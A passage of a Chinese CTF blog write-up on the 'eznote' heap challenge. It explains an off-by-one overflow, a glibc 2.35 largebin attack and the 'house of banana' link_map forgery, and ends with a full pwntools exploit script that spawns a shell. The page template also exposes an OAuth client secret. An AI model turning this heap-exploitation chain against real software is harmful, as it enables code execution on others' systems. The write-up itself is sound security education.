<p>我们可以看到，在一开始的初始化的过程中，先使用calloc函数分配了7个0x18大小的堆块用于后续存储和管理堆快信息。在gdb中调试我们发现是一个0xb0大小的堆块。</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718003050.png"></p>
<p>而漏洞就出现在了add函数的申请过程中：</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718003219.png"></p>
<p>从这里我们可以看出，因为边界的控制不当，我们最多可以申请8个堆块，这就造成了控制堆快上内容的溢出。并且由于管理堆块的结构问题，每个堆块被记录了三个内容，按顺序分别是：申请的size，堆块地址，写入内容的size。由于可以申请8个堆块，因此产生了控制堆块的溢出，而溢出的部分申请的第8个堆块，size正好可以控制到申请的第一个size的大小，这样我们就实现了堆块的重叠，也因此可以控制其他的堆块。</p>
<p>这道题目我们只能申请到size&gt;&#x3D;0x400大小的堆块，因此我们只能够使用largebin_attack。</p>
<h3 id="Largebin-attack"><a href="#Largebin-attack" class="headerlink" title="Largebin_attack"></a>Largebin_attack</h3><h4 id="前置准备"><a href="#前置准备" class="headerlink" title="前置准备"></a>前置准备</h4><p>首先我们申请两个大小不一致的堆块，并且要保证他们处于同一个largebin的size域内，一般情况下我建议是size头部为0x420大小的和0x430大小的堆块，并且中间需要用其他的堆块隔离开，防止合并。</p>
<p>在这道题目中，我申请完成后，堆块布局如下：</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718005327.png"></p>
<p>这个是一开始申请完7个堆块后的布局，之后我们利用漏洞，造成0x410堆块的size的修改，将其改为0x14f1，这时候第一个堆块的size变为了0x14f1，并且fd指针变为了刚刚申请出来的堆块的地址，因此我们直接show一下就可以泄露出堆块地址。之后我们通过释放掉修改后的堆块，并且再次申请大小为0x820的堆块，这样我们就能够将main_arena的地址放到第三个堆块的fd处，从而泄露libc地址。然后我们再将刚刚申请出来的堆块释放掉，这样我们的堆块合并后就还是原先的0x14f1大小的堆块。并且后面的5个堆块都被我给造成了堆块的重叠，这样我们就可以达到修改后面5个堆块内容的目的。</p>
<h4 id="开始攻击"><a href="#开始攻击" class="headerlink" title="开始攻击"></a>开始攻击</h4><p>我们使用largebin_attack攻击的过程大概是：</p>
<ol>
<li><p>首先释放掉两个堆块中较大的一个，使其进入到unstored_bin中。</p>
</li>
<li><p>申请一个比之前释放掉的堆块更大的一个堆块，使其进入到largebin中。（0x420大小的堆块进入0x400范围的largebin中）</p>
</li>
<li><p>释放掉两个堆快中较小的堆块，使其进入到unstored_bin中。</p>
</li>
<li><p>利用漏洞修改较大的堆块及现在处于largebin中堆块的bk_nextsize为target_addr-0x20。</p>
</li>
<li><p>申请一个比第二次释放掉的堆块大的堆块，使第二个堆块进入到largebin中，这个时候在连接的过程中，就可以向我们的目标地址写入一个堆地址，堆地址为较小对快的头部地址。</p>
</li>
<li><p>较大堆块进入unstored_bin中。</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718011224.png"></p>
</li>
<li><p>申请大堆块后，进入到largebin中。<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718011503.png"></p>
</li>
<li><p>释放掉较小堆块进入unstored_bin中。<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718011623.png"></p>
</li>
<li><p>修改较大堆块的bk_nextsize&#x3D;target_addr-0x20。</p>
<p>修改之前的chunk：<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718012340.png"></p>
<p>修改之后的chunk：<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718012410.png"></p>
</li>
<li><p>释放掉较小堆块，堆块头部地址写入目的地址。</p>
<p>修改前：<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718012533.png">修改后：<img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718012613.png"></p>
</li>
</ol>
<p>可见这时候Largebin_attack已经攻击成功了。</p>
<h3 id="house-of-banana"><a href="#house-of-banana" class="headerlink" title="house of banana"></a>house of banana</h3><p>我这里采用的是攻击<code>_ns_loaded</code>的方式，此时我们也已经将堆地址写入了<code>_rtld_global</code>,我们可以看到的是<code>_ns_loaded</code>指向的链表头部已经被我们替换为了我们的堆地址。</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718013213.jpg"></p>
<p>这个时候我们只需要按照上面的说明通过修改堆快的内容，来伪造好<code>link_map</code>结构体即可。</p>
<p>伪造好的结构体的部分显示：</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718013452.png"></p>
<p>我这里采用的是上面第二位师傅的方法，但是由于是头部攻击，我们需要布置一下内容：</p>
<ol>
<li><p><code>l_next</code>指向仍为之前的堆块的<code>l_next</code>。（<code>fake_file+0x20</code>）</p>
</li>
<li><p><code>l-&gt;l_info[26]-&gt;d_un.d_ptr</code>为一个ptr，在ptr+8处为ptr2，而ptr2处为shell地址。（<code>fake_file+0x110</code>）</p>
</li>
<li><p><code>l_real</code>指向自身的地址，在这里就是为堆块的头部。（<code>fake_file+0x40</code>）</p>
</li>
<li><p>控制<code>l-&gt;l_info[28]-&gt;d_un.d_val</code>的值为ptr，且ptr+0x8处是<code>i*8</code>，我们为了方便，一般控制为<code>8</code>。（在<code>fake+0x120</code>写入一个ptr，且ptr+0x8处是<code>i*8</code>。）</p>
</li>
<li><p>控制<code>l-&gt;l_init_called</code>需要等于1,只占一位。我们一般采用的方法就是直接的通过上面大佬给出的命令：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">pwndbg&gt; distance _rtld_global._dl_ns[0]._ns_loaded  &amp;(_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_init_called 
0x7ffff7ffd040-&gt;0x7ffff7ffe47c is 0x314 bytes (0x287 words)
pwndbg&gt; x&#x2F;wx &amp;(_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_init_called 
0x7ffff7ffe47c:	0x0000001c<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>在这种情况下就是<code>fake_file+0x314=0x0000001c</code>，而在高版本中，我这里测试出的是：<code>fake_file+0x31c=0x0000001c</code>。</p>
</li>
</ol>
<p>到这里我们的house of banana就算是可以执行我们任意地址的函数了，但是问题是我们这道题目想要拿到shell，无非就只能通过两种方法。一种是system(“&#x2F;bin&#x2F;sh”)，还有一种是走one_gadget。但是我发现system(“&#x2F;bin&#x2F;sh”)中rdi一直指向链表的前一个表头，我们不太容易使其指向”&#x2F;bin&#x2F;sh”。而one_gadget的话条件都不满足，因此我的方式是使用gadget来改变寄存器中的值从而使得one_gadget满足shell条件。</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718020314.png"></p>
<p>这里我们发现在我们call我们的shell时，r15寄存器的值一直是比较稳定的<code>link_map</code>的头部，由于我们修改后，所以一般就是我们堆地址的头部，而堆地址上的内容可控，因此我们可以使用gadget来对寄存器中的值进行修改，使得寄存器中的值满足调用one_gadget条件后，再调用gadget。并且观察我们发现，此时r10&#x3D;0，而我们发现高版本中有一条gadget的情况我们基本满足：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">0xebcf5 execve(&quot;&#x2F;bin&#x2F;sh&quot;, r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] &#x3D;&#x3D; NULL || r10 &#x3D;&#x3D; NULL
  [rdx] &#x3D;&#x3D; NULL || rdx &#x3D;&#x3D; NULL<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此时我们只需要通过gadget将rdx赋值为0即可。我们使用下面这条命令在libc当中寻找：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">ROPgadget --binary libc.so.6 --only &#39;mov|call&#39; | grep &#39;r15&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>我们重点关注后面是call [r15+偏移]的gadget，我们发现了这样的一条gadget：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">0x000000000008004a : mov rdx, r12 ; mov rsi, r14 ; mov rdi, rbx ; call qword ptr [r15 + 0x38]<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>（该偏移的版本为ubuntu 2.35-0ubuntu3_amd64）</p>
<p>此时r12刚好也为0，满足了我们的条件，因此我们将shell处写为这个gadget，然后在堆地址+0x38处即<code>fake_file+0x38</code>处写入我们的one_gadget地址，这样我们就能够拿到shell。</p>
<p>最后要说的是因为是远端打的话我们不知道ld和libc的偏移，因此可能涉及到要爆破一个字节256中情况，但是这道题我的ld和libc的偏移和远端的一致，就直接通了。(可能远端的也patchelf过的原因……)</p>
<p>最后的exp：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">from pwn import *
r&#x3D;process(&quot;&#x2F;home&#x2F;ubuntu&#x2F;pwn&#x2F;比赛&#x2F;DSCTF&#x2F;eznoted2b1405e&#x2F;eznote&quot;)
# r&#x3D;remote(&quot;39.96.185.98&quot;,1009)
elf&#x3D;ELF(&quot;&#x2F;home&#x2F;ubuntu&#x2F;pwn&#x2F;比赛&#x2F;DSCTF&#x2F;eznoted2b1405e&#x2F;eznote&quot;)
libc&#x3D;ELF(&quot;&#x2F;home&#x2F;ubuntu&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.35-0ubuntu3_amd64&#x2F;libc.so.6&quot;)

context(arch&#x3D;&quot;amd64&quot;,os&#x3D;&quot;linux&quot;,log_level&#x3D;&quot;debug&quot;)
context.terminal &#x3D; [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;sh&#39;,&#39;-c&#39;]

def dbg():
    src&#x3D;&#39;&#39;&#39;
    set debug-file-directory &#x2F;home&#x2F;ubuntu&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.35-0ubuntu3_amd64&#x2F;debug
    b *$rebase(0x1102)
    &#39;&#39;&#39;
    gdb.attach(r,src)
    pause()

def meau(index):
    r.sendlineafter(&quot;&gt; &quot;,str(index))

def add(size,content):
    meau(1)
    r.sendlineafter(&quot;Size: &quot;,str(size))
    if len(content)&lt;size:
        r.sendlineafter(&quot;Content: &quot;,content)
    else:
        r.sendafter(&quot;Content: &quot;,content)

def delete(index):
    meau(2)
    r.sendlineafter(&quot;Idx: &quot;,str(index))

def edit(index,content):
    meau(3)
    r.sendlineafter(&quot;Idx: &quot;,str(index))
    r.sendlineafter(&quot;Content: &quot;,content)

def show(index):
    meau(4)
    r.sendlineafter(&quot;Idx: &quot;,str(index))

##堆块布局
for i in range(1):
    add(0x400+0x10*i,chr(0x61+i))

add(0x400+0x10,chr(0x64))
add(0x400+0x30,chr(0x64))
add(0x400+0x20,chr(0x64))

for i in range(4,7):
    add(0x400+0x10*i,chr(0x61+i))

##利用漏洞修改size，使得堆块重叠，泄露地址后并恢复堆块结构
add(0x14f1,&#39;zzz&#39;)

show(0)

r.recvuntil(&quot;\n&quot;)
heap_base&#x3D;u64(r.recvuntil(&quot;\n&quot;)[:-1].ljust(8,b&#39;\x00&#39;))-0x2110
success(&quot;heap_base &#x3D; &quot;+hex(heap_base))

delete(0)

payload&#x3D;b&#39;\x00&#39;*0x400+p64(0)+p64(0x421)
add(0x820,payload)
show(2)

libc_base&#x3D;u64(r.recvuntil(b&quot;\x7f&quot;,timeout&#x3D;0.1)[-6:].ljust(8,b&quot;\x00&quot;))-0x219ce0
success(&quot;libc_base &#x3D; &quot;+hex(libc_base))

delete(0)

payload&#x3D;b&#39;\x00&#39;*0x400+p64(0)+p64(0x421)
payload&#x3D;payload.ljust(0x820,b&#39;\x00&#39;)+p64(0)+p64(0x441)
payload&#x3D;payload.ljust(0xc60,b&#39;\x00&#39;)+p64(0)+p64(0x431)
payload&#x3D;payload.ljust(0x1090,b&#39;\x00&#39;)+p64(0)+p64(0x451)
add(0x14e0,payload)

##Largebin_attack
delete(3)
add(0x600,&quot;1&quot;)
delete(1)

main_arena&#x3D;libc_base+0x219c80
payload&#x3D;b&#39;\x00&#39;*0x400+p64(0)+p64(0x421)+p64(main_arena+96)*2
payload&#x3D;payload.ljust(0x820,b&#39;\x00&#39;)+p64(0x420)+p64(0x440)
payload&#x3D;payload.ljust(0xc60,b&#39;\x00&#39;)+p64(0)+p64(0x431)+p64(main_arena+1104)*2+p64(heap_base+0xbfb0)
payload+&#x3D;p64(libc_base+0x264040-0x20)
#_rtld_global&#x3D;libc_base+0x264040

edit(0,payload)

add(0x600,&quot;3&quot;)

##house of banana
system_addr&#x3D;libc_base+libc.symbols[&#39;system&#39;]
bin_sh_addr&#x3D;libc_base+libc.search(b&#39;&#x2F;bin&#x2F;sh&#39;).__next__()
gadget&#x3D;libc_base+0x000000000008004a
one_gadget&#x3D;libc_base+0xebcf5
#_rtld_global-&gt;next&#x3D;libc_base + 0x265890

payload&#x3D;b&#39;\x00&#39;*0x400

fake_file_addr&#x3D;heap_base+0x750

fake_file&#x3D;b&#39;\x00&#39;*0x18+p64(libc_base + 0x265890)+p64(0)+p64(fake_file_addr)+p64(0)+p64(one_gadget)
fake_file&#x3D;fake_file.ljust(0x48,b&#39;\x00&#39;)
fake_file+&#x3D;p64(fake_file_addr+0x58)+p64(8)+p64(gadget)
fake_file&#x3D;fake_file.ljust(0x110,b&#39;\x00&#39;)
fake_file+&#x3D;p64(fake_file_addr+0x40)+p64(0)+p64(fake_file_addr+0x48)+p64(8)
fake_file&#x3D;fake_file.ljust(0x31c,b&#39;\x00&#39;)
fake_file+&#x3D;p32(0x1c)

payload&#x3D;payload+fake_file

edit(0,payload)
pause()
meau(5)
r.interactive()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>远端拿到flag：</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718022654.png"></p>
<h1 id="在学习过程中参考的大佬们的资料"><a href="#在学习过程中参考的大佬们的资料" class="headerlink" title="在学习过程中参考的大佬们的资料"></a>在学习过程中参考的大佬们的资料</h1><ol>
<li><a target="_blank" rel="noopener" href="https://giles-one.github.io/2021/10/04/house-of-%E7%B3%BB%E5%88%97%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">https://giles-one.github.io/2021/10/04/house-of-%E7%B3%BB%E5%88%97%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/</a></li>
<li><a target="_blank" rel="noopener" href="https://abf1ag.github.io/2021/12/06/house-of-banana/">https://abf1ag.github.io/2021/12/06/house-of-banana/</a></li>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/180765.html">https://www.secpulse.com/archives/180765.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/222948">https://www.anquanke.com/post/id/222948</a></li>
</ol>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">1amfree</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://1amfree.github.io.com/posts/2564.html">http://1amfree.github.io.com/posts/2564.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">1amfree</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/pwn/">
                                    <span class="chip bg-color">pwn</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: 'a010509df1a6f8ce786d',
        clientSecret: '83812533ea3bde5bf821bc6938a3f35e1151c77e',
        repo: '1amfree.github.io',
        owner: '1amfree',
        admin: "1amfree",
        id: '2022-07-17T20-06-56',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/posts/2564.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="关于house of banana的一次利用">
                        
                        <span class="card-title">关于house of banana的一次利用</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-07-17
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/29696.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/1.jpg" class="responsive-img" alt="关于ql题目的wp">
                        
                        <span class="card-title">关于ql题目的wp</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-05-18
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022</span>
            
            <a href="/about" target="_blank">1amfree</a>
            <!-- |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a> -->
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">14.3k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
                <span id="sitetime"> Loading ...</span>
                <script>
                    var calcSiteTime = function () {
                        var seconds = 1000;
                        var minutes = seconds * 60;
                        var hours = minutes * 60;
                        var days = hours * 24;
                        var years = days * 365;
                        var today = new Date();
                        var startYear = "2022";
                        var startMonth = "4";
                        var startDate = "27";
                        var startHour = "0";
                        var startMinute = "0";
                        var startSecond = "0";
                        var todayYear = today.getFullYear();
                        var todayMonth = today.getMonth() + 1;
                        var todayDate = today.getDate();
                        var todayHour = today.getHours();
                        var todayMinute = today.getMinutes();
                        var todaySecond = today.getSeconds();
                        var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                        var diff = t2 - t1;
                        var diffYears = Math.floor(diff / years);
                        var diffDays = Math.floor((diff / days) - diffYears * 365);

                        // 区分是否有年份.
                        var language = 'zh-CN';
                        if (startYear === String(todayYear)) {
                            document.getElementById("year").innerHTML = todayYear;
                            var daysTip = 'This site has been running for ' + diffDays + ' days';
                            if (language === 'zh-CN') {
                                daysTip = '本站已运行 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                daysTip = '本站已運行 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = daysTip;
                        } else {
                            document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                            var yearsAndDaysTip = 'This site has been running for ' + diffYears + ' years and '
                                + diffDays + ' days';
                            if (language === 'zh-CN') {
                                yearsAndDaysTip = '本站已运行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                yearsAndDaysTip = '本站已運行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = yearsAndDaysTip;
                        }
                    }

                    calcSiteTime();
                </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/1amfree" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2122817150@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2122817150" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2122817150" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
